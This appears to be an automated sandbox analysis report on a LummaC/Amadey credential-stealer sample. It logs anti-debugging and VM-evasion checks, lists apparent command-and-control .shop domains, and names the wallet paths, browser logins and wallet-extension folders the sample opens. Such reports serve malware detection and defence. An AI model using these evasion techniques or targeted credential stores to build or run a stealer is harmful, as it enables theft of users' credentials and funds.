Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Special instruction interceptor: First address: DBEAA5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 7EEB68 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 7EEAA5 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe

Code function: 5_2_05430112 rdtsc

5_2_05430112

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 499			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 541			Jump to behavior

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe TID: 4208	Thread sleep time: -210000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5356	Thread sleep count: 66 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5356	Thread sleep time: -132066s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5588	Thread sleep count: 58 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5588	Thread sleep time: -116058s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2656	Thread sleep count: 499 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2656	Thread sleep time: -14970000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5700	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6248	Thread sleep count: 541 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6248	Thread sleep time: -1082541s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: skotes.exe, skotes.exe, 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Dl6wuWiQdg.exe, 00000000.00000002.2303431239.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2208865107.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2199166936.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2214091045.00000000007B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWSu
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: skotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%
Source: Dl6wuWiQdg.exe, 00000000.00000002.2303431239.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303431239.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2208865107.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2199166936.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2214091045.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.3374357149.0000000001659000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001687000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.0000000005411000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: skotes.exe, 00000009.00000003.3209003950.0000000001687000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW,
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: Dl6wuWiQdg.exe, 00000000.00000002.2304850960.0000000000F71000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: vmci<@
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 8WYS1MQTL0QCOHKIPL8.exe, 00000005.00000003.2326045034.000000000185E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[
Source: Dl6wuWiQdg.exe, 00000000.00000002.2304850960.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, 8WYS1MQTL0QCOHKIPL8.exe, 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmp, skotes.exe, 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe

Code function: 5_2_05430A45 Start: 05430B08 End: 05430AAF

5_2_05430A45

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe

Code function: 5_2_05430112 rdtsc

5_2_05430112

Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Code function: 5_2_00D8652B mov eax, dword ptr fs:[00000030h]	5_2_00D8652B
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Code function: 5_2_00D8A302 mov eax, dword ptr fs:[00000030h]	5_2_00D8A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_007BA302 mov eax, dword ptr fs:[00000030h]	6_2_007BA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_007B652B mov eax, dword ptr fs:[00000030h]	6_2_007B652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_007BA302 mov eax, dword ptr fs:[00000030h]	7_2_007BA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_007B652B mov eax, dword ptr fs:[00000030h]	7_2_007B652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_007BA302 mov eax, dword ptr fs:[00000030h]	9_2_007BA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_007B652B mov eax, dword ptr fs:[00000030h]	9_2_007B652B

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Dl6wuWiQdg.exe	String found in binary or memory: cloudewahsj.shop
Source: Dl6wuWiQdg.exe	String found in binary or memory: noisycuttej.shop
Source: Dl6wuWiQdg.exe	String found in binary or memory: rabidcowse.shop
Source: Dl6wuWiQdg.exe	String found in binary or memory: framekgirus.shop
Source: Dl6wuWiQdg.exe	String found in binary or memory: tirepublicerj.shop
Source: Dl6wuWiQdg.exe	String found in binary or memory: abruptyopsn.shop
Source: Dl6wuWiQdg.exe	String found in binary or memory: wholersorie.shop
Source: Dl6wuWiQdg.exe	String found in binary or memory: fancywaxxers.shop
Source: Dl6wuWiQdg.exe	String found in binary or memory: nearycrepso.shop

Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe

Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"

Jump to behavior

Source: Dl6wuWiQdg.exe, Dl6wuWiQdg.exe, 00000000.00000002.2304850960.0000000000F71000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: uu!HProgram Manager
Source: 8WYS1MQTL0QCOHKIPL8.exe, 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmp, skotes.exe, skotes.exe, 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: Program Manager
Source: Dl6wuWiQdg.exe, 00000000.00000002.2304850960.0000000000F71000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: ouu!HProgram Manager

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 9_2_0079DD91 cpuid

9_2_0079DD91

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe

Code function: 5_2_00D6CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

5_2_00D6CBEA

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 9_2_007865E0 LookupAccountNameA,

9_2_007865E0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 9_2_007C2517 GetTimeZoneInformation,

9_2_007C2517

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Dl6wuWiQdg.exe, 00000000.00000003.2213997207.0000000000814000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2219903539.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2235255051.0000000000838000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2214091045.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303431239.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2214091045.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2213901723.0000000000838000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 9.2.skotes.exe.780000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.skotes.exe.780000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.8WYS1MQTL0QCOHKIPL8.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.skotes.exe.780000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Dl6wuWiQdg.exe PID: 6248, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Dl6wuWiQdg.exe, 00000000.00000002.2303431239.00000000007CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: Dl6wuWiQdg.exe, 00000000.00000002.2303431239.00000000007CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: Dl6wuWiQdg.exe, 00000000.00000002.2303431239.00000000007CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Dl6wuWiQdg.exe, 00000000.00000003.2199107925.000000000082F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: Dl6wuWiQdg.exe, 00000000.00000003.2184466380.00000000053C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3#
Source: Dl6wuWiQdg.exe, 00000000.00000002.2303431239.00000000007CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: Dl6wuWiQdg.exe, 00000000.00000003.2199147278.0000000000810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Dl6wuWiQdg.exe, 00000000.00000003.2199147278.0000000000810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
